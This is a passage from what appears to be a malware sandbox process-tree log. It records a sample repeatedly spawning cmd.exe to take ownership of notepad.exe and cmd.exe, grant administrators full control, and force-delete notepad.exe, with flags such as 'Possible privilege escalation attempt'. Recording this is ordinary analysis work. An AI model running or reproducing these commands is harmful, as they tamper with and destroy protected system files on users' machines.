      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5068
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:1268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4680
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:3112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7948
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:5928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6468
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:6072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:8088
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:6452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:1376
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:4676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:8036
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      PID:5960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7612
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:7268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6980
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:6544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7456
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:5352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6612
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:1096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5384
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7860
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:1092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7344
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7532
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:5064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4240
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:6088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5084
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7196
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:4216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:8012
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      PID:7240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:8064
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:3268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:8100
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:6768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7092
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6396
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7488
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:3720
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:7184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5444
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5152
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:7408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4316
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:7796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5428
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:2768
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4988
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:4936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5216
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:3136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:920
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:5468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7672
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:7644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6344
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7624
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:2036
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2708
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5608
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:2128
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2312
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:8148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:8164
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:4312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:4816
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:4400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:1580
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:7788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5440
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:8032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:3292
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:4700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6620
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:4108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7928
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:4976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:4916
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:1036
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:7420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6348
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6532
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:2132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7096
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:3868
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:5400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5220
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:5620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5392
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:8112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5380
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:2352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7264
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:5844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7276
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:8132
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:2496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7540
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5904
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6672
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5372
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:6676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6708
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3652
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:4308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6912
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4912
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:3588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:3848
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:4160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6684
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3612
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:7820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5600
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:6636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7216
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:2816
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:4028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7916
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:5724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:3176
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5488
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:3404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7336
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:7864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:4836
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6632
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:4420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6936
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:7452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6476
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:1084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:8004
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:3664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:1780
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:2880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7684
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6808
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:7440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5912
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:8124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6604
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:7064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7576
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5476
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7624
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:4920
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:7732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:1416
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:244
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:1348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:4508
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:5900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5560
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7872
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:6356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:4300
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:2764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6892
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7176
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6772
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Modifies file permissions
      PID:5828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:1016
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:2064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7296
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6948
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
